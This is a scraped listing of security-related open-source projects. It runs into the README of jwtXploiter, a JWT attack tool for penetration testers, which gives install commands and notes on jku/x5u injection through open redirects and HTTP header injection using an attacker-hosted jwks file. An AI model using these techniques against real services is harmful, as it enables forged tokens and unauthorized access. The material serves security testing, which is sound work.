|Project Name||Stars||Downloads||Repos Using This||Packages Using This||Most Recent Commit||Total Releases||Latest Release||Open Issues||License||Language|
|Wpscan||7,407||7 days ago||50||other||Ruby|
|WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites. Contact us via [email protected]|
|Certificates||5,159||87||2 days ago||245||September 12, 2022||153||apache-2.0||Go|
|🛡️ A private certificate authority (X.509 & SSH) & ACME server for secure automated certificate management, so you can use TLS everywhere & SSO for SSH.|
|Ah shhgit! Find secrets in your code. Secrets detection for your GitHub, GitLab and Bitbucket repositories: www.shhgit.com|
|Cli||2,931||78||3 days ago||265||September 13, 2022||120||apache-2.0||Go|
|🧰 A zero trust swiss army knife for working with X509, OAuth, JWT, OATH OTP, etc.|
|Itsdangerous||2,635||52,128||583||25 days ago||27||March 24, 2022||bsd-3-clause||Python|
|Safely pass trusted data to untrusted environments and back.|
|Jwt Spring Security Demo||2,534||3 years ago||2||mit||Java|
|A demo for using JWT (Json Web Token) with Spring Security and Spring Boot 2|
|U2f Zero||2,284||a year ago||27||other||C|
|U2F USB token optimized for physical security, affordability, and style|
|Fosite||2,036||50||64||9 days ago||278||April 17, 2022||28||apache-2.0||Go|
|Extensible security first OAuth 2.0 and OpenID Connect SDK for Go.|
|Security Csrf||1,582||2,902||198||a month ago||430||May 14, 2022||mit||PHP|
|The Security CSRF (cross-site request forgery) component provides a class CsrfTokenManager for generating and validating CSRF tokens.|
|Spring Boot Shiro||1,496||2 years ago||3||Java|
A tool to test security of JSON Web Tokens. Test a JWT against all known CVEs;
N.B. Cloning the repository should be avoided except for development purposes! N.B. Deb package has to be considered beta
wget http://andreatedeschi.uno/jwtxploiter/jwtxploiter-1.2.1-1.noarch.rpm sudo rpm --install jwtxploiter-1.2.1-1.noarch.rpm
or, if previous version is installed on your machine
sudo rpm --upgrade jwtxploiter-1.2.1-1.noarch.rpm
sudo pip install jwtxploiter
wget http://andreatedeschi.uno/jwtxploiter/jwtxploiter_1.2.1-1_all.deb sudo dpkg -i jwtxploiter_1.2.1-1_all.deb
Cloing the repo:
git clone https://github.com/DontPanicO/jwtXploiter.git ./install.sh
N.B. python3-pip package is required to install dependencies, be sure to have it installed.
Web Application Penetration Tester / Bug Bounty Hunters
Devs who need to test the secuirty of JWTs used in their applications
Not For Students
For attacks that generates a jwks file, you could find it in the current working directory. Remeber to deletes such files in order to avoid conflicts.
For jku/x5u injection that needs to merge two urls (the server vulnerable url and your one), the HERE keyword is required.
For redirect attacks the keyword should replace the redirect url, e.g.
For jku/x5u injections via HTTP header injection attacks, the HERE keyword sould be appended to the vulnerable parameter, without replacing its value, e.g.
Also, in such cases, be sure to pass the server url and your one as comma separated values.
'/.well-known/jwks.json' is automatically appended to your url in jku/x5u attacks. So make sure to place the jwks file under this path on your server.
If you don't want that happen, use the --manual option, but this option is compatible only with --jku-basic and --x5u-basic so, you will need to manually craft the url and pass it to those options, even for attacks that exploit Open Redirect or HTTP header injection.
Look at the wiki for a detailed documentation.